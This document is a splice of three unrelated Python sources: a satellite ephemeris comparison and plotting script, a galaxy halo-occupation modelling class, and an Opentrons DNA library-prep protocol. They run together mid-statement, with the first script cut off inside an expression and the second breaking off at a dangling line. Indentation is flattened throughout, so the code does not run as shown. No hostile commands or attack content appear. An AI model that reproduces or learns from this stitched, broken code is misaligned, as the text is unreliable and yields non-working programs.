stdout=subprocess.PIPE).communicate()[0].decode())
print('Loading verification data...')
with open('i72_ver.out') as f:
aiaa_ver_file = f.readlines()
with open('ansi_ver.out') as f:
ansi_ver_file = f.readlines()
aiaa_ver_sats = {}
ansi_ver_sats = {}
for i, line in enumerate(aiaa_ver_file):
m = sat_re.findall(line.strip())
if m != []:
current_sat = m[0][0]
aiaa_ver_sats[current_sat] = [float(m[0][1]), 0.0, {}]
else:
try:
vals = list(map(float, line.split()))
except ValueError as e:
print('\n[{0}] {1}'.format(i, str(e)))
aiaa_ver_sats[current_sat][2][vals[0]] = vals[1:]
if ((i % 1000 == 0) | (i == len(aiaa_ver_file) - 1)):
progress = int(i / (len(aiaa_ver_file) - 1) * 20)
print('AIAA: [{0}] {1:7}/{2:7} lines, {3:5} satellites\r'.format(
'=' * progress + ' ' * (20 - progress), i, len(aiaa_ver_file) - 1,
len(aiaa_ver_sats.keys())), end='')
print('')
for i, line in enumerate(ansi_ver_file):
m = sat_re.findall(line.strip())
if m != []:
current_sat = m[0][0]
ansi_ver_sats[current_sat] = [float(m[0][1]), 0.0, {}]
else:
try:
vals = list(map(float, line.split()))
except ValueError as e:
print('\n[{0}] {1}'.format(i, str(e)))
ansi_ver_sats[current_sat][2][vals[0]] = vals[1:]
if ((i % 1000 == 0) | (i == len(ansi_ver_file) - 1)):
progress = int(i / (len(ansi_ver_file) - 1) * 20)
print('ANSI: [{0}] {1:7}/{2:7} lines, {3:5} satellites\r'.format(
'=' * progress + ' ' * (20 - progress), i, len(ansi_ver_file) - 1,
len(ansi_ver_sats.keys())), end='')
print('')
verif_points = {}
verif_annot = []
for sat in list(aiaa_ver_sats.keys()):
maxdelta = 0
for time in aiaa_ver_sats[sat][2].keys():
try:
delta = max(abs(aiaa_ver_sats[sat][2][time][0] - ansi_ver_sats[sat][2][time][0]),
abs(aiaa_ver_sats[sat][2][time][1] - ansi_ver_sats[sat][2][time][1]),
abs(aiaa_ver_sats[sat][2][time][2] - ansi_ver_sats[sat][2][time][2]))
except:
delta = 0
if delta > maxdelta:
maxdelta = delta
verif_points[sat] = maxdelta * 1000 # Convert to meters
verif_annot.append(sat)
# Max difference in verification ephemerides ##################################
fig, axo = plt.subplots(1, 1)
fig.canvas.set_window_title('Verif. ephemeris difference')
for i, sat in enumerate(list(aiaa_ver_sats.keys())):
axo.plot(i, verif_points[sat], c='r', marker='o', ls='', mew=0.0, markersize=8, alpha=0.7)
axo.annotate(sat, (i, verif_points[sat]))
axo.set_xlim(-1, len(aiaa_ver_sats.keys()) + 5)
axo.set_yscale('log')
axo.autoscale(True, 'y', None)
axo.grid(which='major', axis='both', ls='dashed', alpha=0.7)
axo.grid(which='minor', axis='x', ls='dotted', alpha=0.3)
axo.set_title('Max difference in ephemerides: AIAA (zero) vs ANSI (red)')
axo.set_xlabel('Satellite, number')
axo.set_ylabel('Difference, m')
fig.set_tight_layout({'pad':0.0, 'w_pad':0.1, 'h_pad':0.1})
# Solving Kepler's Equation for satellite 23333 ###############################
aiaa_23333_t = []
aiaa_23333_i = []
ansi_23333_i = []
aiaa_23333_m = []
ansi_23333_m = []
for time in aiaa_ver_sats['23333'][2].keys():
aiaa_23333_t.append(time)
aiaa_23333_i.append(aiaa_ver_sats['23333'][2][time][5])
aiaa_23333_m.append(aiaa_ver_sats['23333'][2][time][9])
ansi_23333_i.append(ansi_ver_sats['23333'][2][time][5])
ansi_23333_m.append(ansi_ver_sats['23333'][2][time][9])
fig, (axi, axm) = plt.subplots(2, 1, sharex=True)
fig.canvas.set_window_title('Kepler\'s Equation for 23333')
xmin = 240
xmax = 720
xticksmin = range(xmin, xmax + 1, 60)
xticksmaj = range(xmin, xmax + 1, 120)
y2min = 0
y2max = 360
y2ticksmin = [30, 60, 210, 240, 300, 330]
y2ticksmaj = [90, 180, 270, 360]
axi.plot(aiaa_23333_t, aiaa_23333_i, c='k', marker='', ls=':')
axi.plot(aiaa_23333_t, ansi_23333_i, c='b', marker='', ls='-', alpha=0.6)
axm.plot(aiaa_23333_t, aiaa_23333_m, c='k', marker='', ls=':')
axm.plot(aiaa_23333_t, ansi_23333_m, c='g', marker='', ls='-', alpha=0.6)
axi.set_xlim(xmin, xmax)
axi.set_xticks(xticksmin, True);
axi.set_xticks(xticksmaj, False);
axi.autoscale(True, 'y', None)
axi.grid(which='major', axis='both', ls='dashed', alpha=0.7)
axi.grid(which='minor', axis='x', ls='dotted', alpha=0.3)
axi.set_title('Kepler\'s for 23333, AIAA (black dashed) vs ANSI (color)')
axi.set_ylabel('Inclination, deg')
axm.set_xticks(xticksmin, True);
axm.set_xticks(xticksmaj, False);
axm.set_ylim(y2min, y2max)
axm.set_yticks(y2ticksmin, True);
axm.set_yticks(y2ticksmaj, False);
axm.grid(which='major', axis='both', ls='dashed', alpha=0.7)
axm.grid(which='minor', axis='x', ls='dotted', alpha=0.3)
axm.set_xlabel('Time from epoch, min')
axm.set_ylabel('Mean anomaly, deg')
fig.set_tight_layout({'pad':0.0, 'w_pad':0.1, 'h_pad':0.1})
# Lunar-solar modifications for Satellite 23599 ###############################
aiaa_argper = []
ansi_argper = []
aiaa_pos23599_x1 = []
aiaa_pos23599_yx = []
aiaa_pos23599_yy = []
aiaa_pos23599_yz = []
ansi_pos23599_yx = []
ansi_pos23599_yy = []
ansi_pos23599_yz = []
for time in aiaa_ver_sats['23599'][2].keys():
aiaa_pos23599_x1.append(time)
aiaa_argper.append(aiaa_ver_sats['23599'][2][time][7])
ansi_argper.append(ansi_ver_sats['23599'][2][time][7])
aiaa_pos23599_yx.append(aiaa_ver_sats['23599'][2][time][0])
aiaa_pos23599_yy.append(aiaa_ver_sats['23599'][2][time][1])
aiaa_pos23599_yz.append(aiaa_ver_sats['23599'][2][time][2])
ansi_pos23599_yx.append(ansi_ver_sats['23599'][2][time][0])
ansi_pos23599_yy.append(ansi_ver_sats['23599'][2][time][1])
ansi_pos23599_yz.append(ansi_ver_sats['23599'][2][time][2])
fig, (axa, axp) = plt.subplots(2, 1, sharex=True)
fig.canvas.set_window_title('L-S mods for 23599')
xmin = int(min(aiaa_pos23599_x1))
xmax = int(max(aiaa_pos23599_x1))
xticksmin = range(xmin, xmax + 1, 20)
xticksmaj = range(xmin, xmax + 1, 60)
axa.plot(aiaa_pos23599_x1, aiaa_argper, c='k', marker='', ls=':')
axa.plot(aiaa_pos23599_x1, ansi_argper, c='r', marker='', ls='-', alpha=0.6)
axa.set_xlim(xmin, xmax)
axa.set_xticks(xticksmin, True);
axa.set_xticks(xticksmaj, False);
axa.autoscale(True, 'y', None)
axa.grid(which='major', axis='both', ls='dashed', alpha=0.7)
axa.grid(which='minor', axis='x', ls='dotted', alpha=0.3)
axa.set_title('L-S mod. for 23599, AIAA (black dashed) vs ANSI (color)')
axa.set_ylabel('Argument of perigee, deg')
axp.plot(aiaa_pos23599_x1, aiaa_pos23599_yx, c='k', marker='', ls=':')
axp.plot(aiaa_pos23599_x1, aiaa_pos23599_yy, c='k', marker='', ls=':')
axp.plot(aiaa_pos23599_x1, aiaa_pos23599_yz, c='k', marker='', ls=':')
axp.plot(aiaa_pos23599_x1, ansi_pos23599_yx, c='b', marker='', ls='-', alpha=0.6)
axp.plot(aiaa_pos23599_x1, ansi_pos23599_yy, c='g', marker='', ls='-', alpha=0.6)
axp.plot(aiaa_pos23599_x1, ansi_pos23599_yz, c='m', marker='', ls='-', alpha=0.6)
axp.set_xticks(xticksmin, True);
axp.set_xticks(xticksmaj, False);
axp.autoscale(True, 'y', None)
axp.grid(which='major', axis='both', ls='dashed', alpha=0.7)
axp.grid(which='minor', axis='x', ls='dotted', alpha=0.3)
axp.set_xlabel('Time from epoch, min')
axp.set_ylabel('Position components, km')
fig.set_tight_layout({'pad':0.0, 'w_pad':0.1, 'h_pad':0.1})
# Lyddane Choice Modification for Satellite 14128 #############################
incl_bar = []
aiaa_14128_t = []
aiaa_14128_i = []
ansi_14128_i = []
dpy_14128 = []
dpz_14128 = []
for time in aiaa_ver_sats['14128'][2].keys():
incl_bar.append(11.4592)
aiaa_14128_t.append(time)
aiaa_14128_i.append(aiaa_ver_sats['14128'][2][time][5])
ansi_14128_i.append(ansi_ver_sats['14128'][2][time][5])
dpy_14128.append(aiaa_ver_sats['14128'][2][time][1] - ansi_ver_sats['14128'][2][time][1])
dpz_14128.append(aiaa_ver_sats['14128'][2][time][2] - ansi_ver_sats['14128'][2][time][2])
fig, (axi, axp) = plt.subplots(2, 1, sharex=True)
fig.canvas.set_window_title('Lyddane Choice for 14128')
xmin = 0
xmax = 2880
xticksmin = range(xmin, xmax + 1, 60)
xticksmaj = range(xmin, xmax + 1, 240)
axi.plot(aiaa_14128_t, incl_bar, c='k', marker='', ls='-', lw=0.5)
axi.plot(aiaa_14128_t, aiaa_14128_i, c='k', marker='', ls=':')
axi.plot(aiaa_14128_t, ansi_14128_i, c='b', marker='', ls='-', alpha=0.6)
axp.plot(aiaa_14128_t, dpy_14128, c='g', marker='', ls='-')
axp.plot(aiaa_14128_t, dpz_14128, c='m', marker='', ls='-')
axi.set_xlim(xmin, xmax)
axi.set_xticks(xticksmin, True);
axi.set_xticks(xticksmaj, False);
axi.autoscale(True, 'y', None)
axi.grid(which='major', axis='both', ls='dashed', alpha=0.7)
axi.grid(which='minor', axis='x', ls='dotted', alpha=0.3)
axi.set_title('Lyddane Choice for 14128, AIAA (black dashed) vs ANSI (color)')
axi.set_ylabel('Inclination, deg')
axp.set_xticks(xticksmin, True);
axp.set_xticks(xticksmaj, False);
axp.set_ylim(y2min, y2max)
axp.set_yticks(y2ticksmin, True);
axp.set_yticks(y2ticksmaj, False);
axp.grid(which='major', axis='both', ls='dashed', alpha=0.7)
axp.grid(which='minor', axis='x', ls='dotted', alpha=0.3)
axp.set_xlabel('Time from epoch, min')
axp.set_ylabel('Position difference, m')
fig.set_tight_layout({'pad':0.0, 'w_pad':0.1, 'h_pad':0.1})
def fullcat():
print('Running AIAA-2006-6753 full catalogue mode...')
start = datetime.datetime.now()
print(subprocess.Popen([os.path.join(os.getcwd(), aiaa_binary), 'i', 'c', fullcat_filename],
stdout=subprocess.PIPE).communicate()[0].decode())
stop = datetime.datetime.now()
global tdiff_ic
tdiff_ic = stop - start
print('Running libsgp4ansi full catalogue mode...')
start = datetime.datetime.now()
print(subprocess.Popen([os.path.join(os.getcwd(), ansi_binary), 'c', fullcat_filename],
stdout=subprocess.PIPE).communicate()[0].decode())
stop = datetime.datetime.now()
global tdiff_ansic
tdiff_ansic = stop - start
print('Loading full catalogue data...')
with open(aiaa_out_filename) as f:
aiaa_file = f.readlines()
with open(ansi_out_filename) as f:
ansi_file = f.readlines()
aiaa_sats = {}
ansi_sats = {}
for i, line in enumerate(aiaa_file):
m = sat_re.findall(line.strip())
if m != []:
current_sat = m[0][0]
aiaa_sats[current_sat] = [float(m[0][1]), 0.0, {}]
else:
try:
vals = list(map(float, line.split()))
except ValueError as e:
print('\n[{0}] {1}'.format(i, str(e)))
aiaa_sats[current_sat][2][vals[0]] = vals[1:]
if ((i % 1000 == 0) | (i == len(aiaa_file) - 1)):
progress = int(i / (len(aiaa_file) - 1) * 20)
print('AIAA: [{0}] {1:7}/{2:7} lines, {3:5} satellites\r'.format(
'=' * progress + ' ' * (20 - progress), i, len(aiaa_file) - 1,
len(aiaa_sats.keys())), end='')
print('')
for i, line in enumerate(ansi_file):
m = sat_re.findall(line.strip())
if m != []:
current_sat = m[0][0]
ansi_sats[current_sat] = [float(m[0][1]), 0.0, {}]
else:
try:
vals = list(map(float, line.split()))
except ValueError as e:
print('\n[{0}] {1}'.format(i, str(e)))
ansi_sats[current_sat][2][vals[0]] = vals[1:]
if ((i % 1000 == 0) | (i == len(ansi_file) - 1)):
progress = int(i / (len(ansi_file) - 1) * 20)
print('ANSI: [{0}] {1:7}/{2:7} lines, {3:5} satellites\r'.format(
'=' * progress + ' ' *
self.model = HodModelFactory(
centrals_occupation=cens_occ,
centrals_profile=TrivialPhaseSpace(redshift=z),
satellites_occupation=sats_occ,
satellites_profile=sat_phase_space)
self.populated_once = False  # cover for loading new ones
def get_assembias_key(self, gal_type):
'''
Helper function to get the key of the assembly bias strength parameter, as it is obscure to access.
:param gal_type:
Galaxy type to get Assembias strength. Options are 'centrals' and 'satellites'.
:return:
'''
assert gal_type in {'centrals', 'satellites'}
return self.model.input_model_dictionary['%s_occupation' % gal_type]._get_assembias_param_dict_key(0)
# TODO this isn't a traditional observable, so I can't use the same decorator. Not sure how to handle that.
# TODO little h's here and in hod?
def calc_mf(self, mass_bin_range=(9, 16), mass_bin_size=0.01, min_ptcl=200):
"""
Get the mass function of the halo catalog.
:param mass_bin_range
A tuple of the lower and upper bounds of the log mass bins. Default is (9, 16)
:param mass_bin_size:
Mass bin size to use, in dex. Default is 0.01 dex
:param min_ptcl:
Minimum number of particles in a halo. Default is 200
:return:
mass_function, the mass function of halocat.
"""
try:
assert self.halocat is not None
except AssertionError:
raise AssertionError("Please load a halocat before calling calc_mf.")
if hasattr(self, '_mf_min_%d'%min_ptcl):
return getattr(self, '_mf_min_%d'%min_ptcl)
#if hasattr(self, '_last_halocat_id'):
# if self._last_halocat_id == id(self.halocat):
# return self._last_mf
masses = self.halocat.halo_table[self.halocat.halo_table['halo_upid'] == -1]['halo_mvir']
masses = masses[masses > min_ptcl * self.pmass]
mass_bins = np.logspace(mass_bin_range[0], mass_bin_range[1],
int((mass_bin_range[1] - mass_bin_range[0]) / mass_bin_size) + 1)
mf = np.histogram(masses, mass_bins)[0]
#self._last_mf = mf
#self._last_halocat_id = id(self.halocat)
setattr(self, '_mf_min_%d'%min_ptcl, mf)
return mf
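# Self-contained sketch of the binning performed above (fake masses, illustrative only):
#   import numpy as np
#   bins = np.logspace(9, 16, int((16 - 9) / 0.01) + 1)     # log-spaced mass bins
#   masses = 10 ** np.random.uniform(11, 15, size=1000)     # stand-in halo masses
#   mf = np.histogram(masses, bins)[0]                       # counts per bin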
# TODO same concerns as above
def _add_logMmin(self, nd, min_ptcl=200):
"""
In the fixed number density case, find the logMmin value that will match the nd given hod_params
:param: hod_params:
The other parameters besides logMmin
:param cat:
the catalog in question
:return:
None. hod_params will have logMmin added to it.
"""
# cat.populate(hod_params) #may be overkill, but will ensure params are written everywhere
logMmin_bounds = (12.0, 15.0)
hod_params = self.model.param_dict.copy()
def func(logMmin, hod_params):
#print logMmin
hod_params.update({'logMmin': logMmin})
return (self.calc_analytic_nd(hod_params, min_ptcl = min_ptcl) - nd) ** 2
res = minimize_scalar(func, bounds=logMmin_bounds, args=(hod_params,), options={'maxiter': 100},
method='Bounded')
# assuming this doesn't fail
#print 'logMmin', res.x
self.model.param_dict['logMmin'] = res.x
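# Minimal stand-alone sketch of the same root-finding idea (toy_nd is a made-up,
# monotonic stand-in for calc_analytic_nd; not part of this class):
#   from scipy.optimize import minimize_scalar
#   toy_nd = lambda logMmin: 10 ** (-2.0 - 0.5 * (logMmin - 12.0))
#   res = minimize_scalar(lambda m: (toy_nd(m) - 1e-3) ** 2,
#                         bounds=(12.0, 15.0), method='Bounded')
#   res.x  # ~14.0, the logMmin that reproduces the target number density of 1e-3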
def calc_hod(self, params={}, mass_bin_range=(9, 16), mass_bin_size=0.01, component='all'):
"""
Calculate the analytic HOD for a set of parameters
:param params:
HOD parameters. Only those that are changed from the original are required; the rest will remain the default.
:param mass_bin_range
A tuple of the lower and upper bounds of the log mass bins. Default is (9, 16)
:param mass_bin_size:
Mass bin size to use, in dex. Default is 0.01 dex
:param component:
Which HOD component to compute for. Acceptable are "all" (default), "central" or "satellite"
:return:
"""
assert component in {'all', 'central', 'satellite'}
try:
assert self.model is not None
except AssertionError:
raise AssertionError("Please load a model before calling calc_hod.")
bins = np.logspace(mass_bin_range[0], mass_bin_range[1],
int((mass_bin_range[1] - mass_bin_range[0]) / mass_bin_size) + 1)
bin_centers = (bins[:-1] + bins[1:]) / 2
self.model.param_dict.update(params)
cens_occ, sats_occ = self.model.model_dictionary['centrals_occupation'], self.model.model_dictionary[
'satellites_occupation']
for key, val in params.iteritems():
if key in cens_occ.param_dict:
cens_occ.param_dict[key] = val
if key in sats_occ.param_dict:
sats_occ.param_dict[key] = val
if component == 'all' or component == 'central':
cen_hod = getattr(cens_occ, "baseline_mean_occupation", cens_occ.mean_occupation)(prim_haloprop=bin_centers)
if component == 'central':
return cen_hod
if component == 'all' or component == 'satellite':
sat_hod = getattr(sats_occ, "baseline_mean_occupation", sats_occ.mean_occupation)(prim_haloprop=bin_centers)
if component == 'satellite':
return sat_hod
return cen_hod + sat_hod
def calc_analytic_nd(self, params={}, min_ptcl = 200):
"""
Calculate the number density from the HOD and mass function, rather than recovering it from a populated catalog.
:param params:
HOD parameters. Only those that are changed from the original are required; the rest will remain the default.
:return: nd, a float that represents the analytic number density
"""
mf = self.calc_mf(min_ptcl=min_ptcl)
hod = self.calc_hod(params)
return np.sum(mf * hod) / ((self.Lbox) ** 3) # /self.h)**3)
def calc_xi_mm(self, rbins, n_cores='all', use_corrfunc=False):
"""
Calculate the matter-matter realspace autocorrelation function
:param rbins:
radial binning to use during computation
:param n_cores:
number of cores to use during computation. Must be an integer or 'all'. Default is 'all'
:param use_corrfunc:
Boolean, whether or not to use corrfunc if it is available. Default is False. If False, will use
halotools.
:return:
"""
if hasattr(self, '_xi_mm_bins') and np.all(self._xi_mm_bins == rbins): # we have this one cached
return self._xi_mm
if use_corrfunc:
assert CORRFUNC_AVAILABLE
n_cores = self._check_cores(n_cores)
x, y, z = [self.halocat.ptcl_table[c] for c in ['x', 'y', 'z']]
pos = return_xyz_formatted_array(x, y, z, period=self.Lbox)
if use_corrfunc:
out = xi(self.Lbox / self.h, n_cores, rbins,
x.astype('float32') / self.h, y.astype('float32') / self.h,
z.astype('float32') / self.h)
xi_all = out[4] # returns a lot of irrelevant info
# TODO jackknife with corrfunc?
else:
xi_all = tpcf(pos / self.h, rbins, period=self.Lbox / self.h, num_threads=n_cores,
estimator='Landy-Szalay')
# cache, so we don't have to repeat this calculation several times.
self._xi_mm_bins = rbins
self._xi_mm = xi_all
return xi_all
def populate(self, params={}, min_ptcl=200):
'''
Populate the stored halocatalog with a new realization. Load must be called first.
:param params:
HOD parameters. Only those that are changed from the original are required; the rest will remain the default.
:param min_ptcl:
Minimum number of particles which constitutes a halo.
:return: None
'''
try:
assert self.model is not None
except AssertionError:
raise AssertionError("Please call load before calling populate.")
self.model.param_dict.update(params)
# might be able to check if model has attr 'mock'.
if self.populated_once:
self.model.mock.populate(Num_ptcl_requirement=min_ptcl)
else:
self.model.populate_mock(self.halocat, Num_ptcl_requirement=min_ptcl)
self.populated_once = True
# TODO how to handle analytic v observed nd
@observable()
def calc_number_density(self):
'''
Return the number density for a populated box.
:param: halo
Whether to calculate the number density of halos instead of galaxies. Default is False.
:return: Number density of a populated box.
'''
return self.model.mock.number_density #* self.h ** 3
# TODO do_jackknife to cov?
@observable()
def calc_xi(self, rbins, n_cores='all', do_jackknife=False, use_corrfunc=False, jk_args={}, halo=False, PBC=True):
'''
Calculate a 3-D correlation function on a populated catalog.
:param rbins:
Radial bins for the correlation function.
:param n_cores
Number of cores to use. default is 'all'
:param do_jackknife:
Whether or not to do a jackknife along with the xi calculation. Generally slower. Not supported
with corrfunc at present.
:param use_corrfunc:
Whether or not to use the halotools function to calculate xi, or Manodeep's corrfunc. Corrfunc is not
available on all systems and currently jackknife is not supported.
:param jk_args
Dictionary of arguments for the jackknife call.
:param halo
Whether to calculate the halo correlation instead of the galaxy correlation. Default is False.
:return: xi:
len(rbins) 3-D correlation function
xi_cov (if do_jacknife and ! use_corrfunc):
(len(rbins), len(rbins)) covariance matrix for xi.
'''
if PBC:
period = self.Lbox
else:
period = None
assert not (do_jackknife and use_corrfunc) # can't both be true.
n_cores = self._check_cores(n_cores)
if halo:
x, y, z = [self.model.mock.halo_table[c] for c in ['halo_x', 'halo_y', 'halo_z']]
else:
x, y, z = [self.model.mock.galaxy_table[c] for c in ['x', 'y', 'z']]
pos = return_xyz_formatted_array(x, y, z, period=self.Lbox)
if use_corrfunc:
'''
# write bins to file
# unforunately how corrfunc has to work
# TODO A custom binfile, or one that's already written?
bindir = path.dirname(path.abspath(__file__)) # location of files with bin edges
with open(path.join(bindir, './binfile'), 'w') as f:
for low, high in zip(rbins[:-1], rbins[1:]):
f.write('\t%f\t%f\n' % (low, high))
# countpairs requires casting in order to work right.
xi_all = countpairs_xi(self.model.mock.Lbox / self.h, n_cores, path.join(bindir, './binfile'),
x.astype('float32') / self.h, y.astype('float32') / self.h,
z.astype('float32') / self.h)
xi_all = np.array(xi_all, dtype='float64')[:, 3]
'''
out = xi(self.model.mock.Lbox , n_cores, rbins,
x.astype('float32') , y.astype('float32') ,
z.astype('float32') )
xi_all = out[4] # returns a lot of irrelevant info
# TODO jackknife with corrfunc?
else:
if do_jackknife:
np.random.seed(int(time()))
if not jk_args:
# TODO customize these?
n_rands = 5
n_sub = 5
if 'rand_scalecut' in jk_args:
n_rands = [25, 5]
else:
n_rands = jk_args['n_rands']
n_sub = jk_args['n_sub']
if 'rand_scalecut' in jk_args: # do the jk differently for different scale cuts
assert hasattr(n_rands, "__iter__"), "rand_scalecut called but n_rands is not iterable."
rand_scalecut = jk_args['rand_scalecut']
rbins = np.array(rbins)
rbins_small, rbins_large = list(rbins[rbins < rand_scalecut]), list(rbins[rbins >= rand_scalecut])
rbins_large.insert(0, rbins_small[-1]) # make sure the middle bin is not cut
xis, covs
# Repository: spencer-siddons/Moeller_Opentrons_protocol_library
from opentrons import protocol_api
from numpy import ceil
metadata = {'apiLevel': '2.5',
'author': '<NAME>'}
# Set to `True` to perform a short run, with brief pauses and only
# one column of samples
test_run = True
if test_run:
pause_bind = 5
pause_mag = 3
pause_dry = 5
pause_elute = 5
# Limit columns
cols = ['A1', 'A2']
else:
pause_bind = 5*60
pause_mag = 3*60
pause_dry = 5*60
pause_elute = 5*60
# Full set of columns
cols = ['A1', 'A2', 'A3', 'A4', 'A5', 'A6',
'A7', 'A8', 'A9', 'A10', 'A11', 'A12']
# bead aspiration flow rate
bead_flow = .25
# wash mix multiplier
wash_mix = 5
# Wash 1 (TWB) columns
twb_cols = ['A3', 'A4']
# PCR MM columns
pcr_cols = ['A4', 'A5']
# EtOH columns
eth_cols = ['A6', 'A7', 'A8']
# define magnet engagement height for plates
mag_engage_height = 6
def bead_mix(pipette,
plate,
cols,
tiprack,
n=5,
mix_vol=200,
drop_tip=False):
for col in cols:
pipette.pick_up_tip(tiprack.wells_by_name()[col])
pipette.mix(n,
mix_vol,
plate[col].bottom(z=2))
pipette.blow_out(plate[col].top())
if drop_tip:
pipette.drop_tip()
else:
pipette.return_tip()
return()
def remove_supernatant(pipette,
plate,
cols,
tiprack,
waste,
super_vol=600,
rate=0.25,
bottom_offset=2,
drop_tip=False):
# remove supernatant
for col in cols:
vol_remaining = super_vol
# transfers to remove supernatant:
pipette.pick_up_tip(tiprack.wells_by_name()[col])
transfers = int(ceil(super_vol/190))
while vol_remaining > 0:
transfer_vol = min(vol_remaining, 190)
if vol_remaining <= 190:
z_height = bottom_offset
else:
z_height = 4
pipette.aspirate(transfer_vol,
plate[col].bottom(z=z_height),
rate=rate)
pipette.air_gap(10)
pipette.dispense(transfer_vol + 10, waste.top())
vol_remaining -= transfer_vol
pipette.blow_out()
# we're done with these tips at this point
if drop_tip:
pipette.drop_tip()
else:
pipette.return_tip()
return()
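# Illustrative split (made-up volume): super_vol=600 µL is removed as 190 + 190 + 190 + 30 µL
# aspirations, each followed by a 10 µL air gap and dispensed to the waste top.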
def add_buffer(pipette,
plate,
cols,
wash_vol,
source_wells,
source_vol,
tip=None,
tip_vol=300,
remaining=None,
drop_tip=True):
if tip is not None:
pipette.pick_up_tip(tip)
else:
pipette.pick_up_tip()
source_well = source_wells[0]
if remaining is None:
remaining = source_vol
transfers = int(ceil(wash_vol/(tip_vol-10)))
transfer_vol = wash_vol/transfers
for col in cols:
for i in range(0,transfers):
# print("%s µL remaining in %s" % (remaining, source_well))
# print("Transferring %s to %s" % (transfer_vol, col))
pipette.aspirate(transfer_vol,
source_well)
pipette.air_gap(10)
pipette.dispense(transfer_vol + 10,
plate[col].top())
remaining -= transfer_vol
if remaining < transfer_vol + source_vol*0.1:
# print("Only %s remaining in %s\n" % (remaining, source_well))
source_wells.pop(0)
source_well = source_wells[0]
# print("Moving on to %s\n" % source_well)
remaining = source_vol
pipette.blow_out()
if drop_tip:
pipette.drop_tip()
else:
pipette.return_tip()
return(remaining, source_wells)
def bead_wash(# global arguments
protocol,
magblock,
pipette,
plate,
cols,
# super arguments
super_waste,
super_tiprack,
# wash buffer arguments
source_wells,
source_vol,
# mix arguments
mix_tiprack,
# optional arguments
super_vol=600,
rate=bead_flow,
super_bottom_offset=2,
drop_super_tip=True,
wash_vol=300,
remaining=None,
wash_tip=None,
drop_wash_tip=True,
mix_vol=200,
mix_n=wash_mix,
drop_mix_tip=False,
mag_engage_height=mag_engage_height,
pause_s=pause_mag
):
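"""Perform one magnetic bead wash cycle.
Removes supernatant to waste, disengages the magnet, adds wash buffer from
`source_wells`, mixes, then re-engages the magnet and pauses for `pause_s`
seconds. Returns the add_buffer() state (remaining volume, source wells) so
repeated washes can keep drawing from the same reservoir wells.
"""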
# Wash
# This should:
# - pick up tip from position 7
# - pick up 190 µL from the mag plate
# - air gap
# - dispense into position 11
# - repeat x
# - trash tip
# - move to next column
# - disengage magnet
# remove supernatant
remove_supernatant(pipette,
plate,
cols,
super_tiprack,
super_waste,
super_vol=super_vol,
rate=bead_flow,
bottom_offset=super_bottom_offset,
drop_tip=drop_super_tip)
# disengage magnet
magblock.disengage()
# This should:
# - pick up tips (or reuse the provided wash tip)
# - pick up wash buffer from the current source well
# - dispense to `cols` in mag plate
# - move on to the next source well when the current one runs low
# - drop tips at end
# add wash buffer
wash_remaining, wash_wells = add_buffer(pipette,
plate,
cols,
wash_vol=wash_vol,
source_wells=source_wells,
source_vol=source_vol,
tip=wash_tip,
remaining=remaining,
drop_tip=drop_wash_tip)
# This should:
# - grab a tip from position 8
# - mix 5 times the corresponding well on mag plate
# - blow out
# - return tip
# - do next col
# - engage magnet
# mix
bead_mix(pipette,
plate,
cols,
mix_tiprack,
n=mix_n,
mix_vol=mix_vol,
drop_tip=drop_mix_tip)
# engage magnet
magblock.engage(height_from_base=mag_engage_height)
protocol.delay(seconds=pause_s)
return(wash_remaining, wash_wells)
def run(protocol: protocol_api.ProtocolContext):
# ### HackFlex Illumina-compatible library prep protocol
# ### Deck
# 1. samples; libraries
# 2. reagent reservoir
# 3. reagent strip tubes
# 4. 300 tips (wash); 200f tips (elute)
# 5. 10f tips (samples)
# 6. i7 primers
# 7. waste
# 8. 300 tips (reagents)
# 9. 10f tips (primers)
# 10. mag module
# 11. 20 tips (reagents)
# 12. trash
# define custom labware for strip tubes block
# reagent strip tubes:
# 1: BLT 150 µL
# 2: TSB 150 µL
# 3: i5 primers 150 µL
# 4: PCR MM 200 µL
# 5: PCR MM 200 µL
# buffer reservoirs:
# 1: TB1 (2.5 mL)
# 2: TWB (10 mL)
# 3: TWB (10 mL)
# 4: H2O (8 mL)
# 5: beads (6 mL)
# 6: 80% EtOH
# 7: 80% EtOH
# 8: 80% EtOH
# ### Setup
protocol.home()
# define deck positions and labware
# define hardware modules
magblock = protocol.load_module('Magnetic Module', 10)
magblock.disengage()
# tips
tiprack_samples = protocol.load_labware('opentrons_96_filtertiprack_10ul',
5)
tiprack_buffers = protocol.load_labware('opentrons_96_tiprack_300ul',
8)
tiprack_wash = protocol.load_labware('opentrons_96_tiprack_300ul',
4)
tiprack_primers = protocol.load_labware('opentrons_96_filtertiprack_10ul',
9)
tiprack_reagents = protocol.load_labware('opentrons_96_tiprack_20ul',
11)
# reagents
# should be new custom labware with strip tubes
reagents = protocol.load_labware('opentrons_96_aluminumblock_generic_pcr_strip_200ul',
3, 'reagents')
buffers = protocol.load_labware('nest_12_reservoir_15ml',
2, 'wash buffers')
waste = protocol.load_labware('nest_1_reservoir_195ml',
7, 'liquid waste')
# plates
samples = protocol.load_labware('biorad_96_wellplate_200ul_pcr',
1, 'samples')
i7_primers = protocol.load_labware('biorad_96_wellplate_200ul_pcr',
6, 'i7 primers')
# load plate on magdeck
# mag_plate = magblock.load_labware('vwr_96_wellplate_1000ul')
mag_plate = magblock.load_labware('biorad_96_wellplate_200ul_pcr')
# initialize pipettes
pipette_left = protocol.load_instrument('p300_multi',
'left',
tip_racks=[tiprack_buffers])
pipette_right = protocol.load_instrument('p10_multi',
'right',
tip_racks=[tiprack_reagents])
# TWB wash wells
twb_wells = [buffers[x] for x in twb_cols]
# PCR MM wells
pcr_wells = [reagents[x] for x in pcr_cols]
# EtOH wells
eth_wells = [buffers[x] for x in eth_cols]
# DNA plate
# Step 1: Tagmentation
# Diluted BLT: 1 mL; 120 (150 µL) per tip
# TB1: 2.4 mL; 300 (350 µL) per tip
# add TB1.
# buffer tips 1
pipette_left.distribute(25,
buffers['A1'],
[mag_plate[x] for x in cols],
touch_tip=False,
disposal_volume=10,
new_tip='once',
trash=True)
# add BLT
# reagent tips 2
# mix BLT first
pipette_right.pick_up_tip()
pipette_right.mix(10,
10,
reagents['A1'])
pipette_right.transfer(10,
reagents['A1'],
[mag_plate[x] for x in cols],
mix_before=(2,10),
new_tip='never')
pipette_right.drop_tip()
# add sample
for col in cols:
pipette_right.pick_up_tip(tiprack_samples[col])
pipette_right.transfer(10,
samples[col],
mag_plate[col],
mix_after=(5, 10),
new_tip='never',
trash=False)
pipette_right.return_tip()
# Prompt user to remove plate and run on thermocycler
protocol.pause('Remove plate from magblock, seal, vortex, and run '
'program TAG on thermocycler. Then spin down, unseal, '
'and return to magblock.')
